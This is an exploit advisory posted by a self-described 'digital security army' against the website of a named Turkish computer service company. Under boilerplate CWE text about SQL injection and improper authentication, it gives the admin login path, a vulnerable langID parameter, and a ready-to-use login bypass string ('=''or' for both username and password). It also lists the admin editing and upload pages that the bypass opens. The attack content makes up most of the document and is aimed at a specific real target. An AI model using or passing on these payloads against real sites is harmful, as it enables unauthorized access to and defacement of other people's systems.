################################################################### # Exploit Title : AloPCServis Bursa Computer Service SQL Injection Authentication Bypass # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 01/09/2019 # Vendor Homepage : alopcservis.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-287 [ Improper Authentication ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ################################################################### # Impact : *********** * AloPCServis Bursa Computer Service is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool. * Authentication is any process by which a system verifies the identity of a user who wishes to access it.When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. Improper authentication occurs when an application improperly verifies the identity of a user. A software incorrectly validates user's login information and as a result, an attacker can gain certain privileges within the application or disclose sensitive information that allows them to access sensitive data and provoke arbitrary code execution. The weakness is introduced during Architecture and Design, Implementation stages. ################################################################### # Admin Panel Login Path : ************************ /admin/login.php # SQL Injection Exploit : ********************** /galeriler/index.php?language=tr&langID=[SQL Injection] # Authentication Bypass Exploit : ***************************** Admin Username : '=''or' Admin Password : '=''or' /admin/index.php?type=1&module=slider /admin/index.php?type=1&module=slider&sayfa=duzenle&id=282 /admin/index.php?type=1&module=slider&sayfa=yeni /uploads/images/[yourfilename].png .jpg .gif /admin/index.php?type=1&module=kurumsal /admin/index.php?type=1&module=kurumsal&sayfa=duzenle&id=285 /admin/index.php?type=1&module=kurumsal&sayfa=yeni /admin/index.php?type=2&module=haberler-kategori /admin/index.php?type=2&module=haberler-kategori&sayfa=duzenle&id=9 /admin/index.php?type=2&module=haberler-kategori&sayfa=yeni /admin/index.php?type=1&module=haberler /admin/index.php?type=1&module=haberler&sayfa=duzenle&id=9 /admin/index.php?type=1&module=haberler&sayfa=yeni /admin/index.php?type=2&module=kategoriler /admin/index.php?type=2&module=kategoriler&sayfa=duzenle&id=39 /admin/index.php?type=2&module=kategoriler&sayfa=yeni /admin/index.php?type=3&module=urunler /admin/index.php?type=3&module=urunler&sayfa=duzenle&id=38 /admin/index.php?type=3&module=urunler&sayfa=yeni /admin/index.php?type=2&module=galeri-kategori /admin/index.php?type=2&module=galeri-kategori&sayfa=duzenle&id=45 /admin/index.php?type=2&module=galeri-kategori&sayfa=yeni /admin/index.php?type=1&module=galeri /admin/index.php?type=1&module=galeri&sayfa=duzenle&id=286 /admin/index.php?type=1&module=galeri&sayfa=yeni /admin/index.php?type=0&module=ayarlar /admin/index.php?type=4&module=tasarim ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################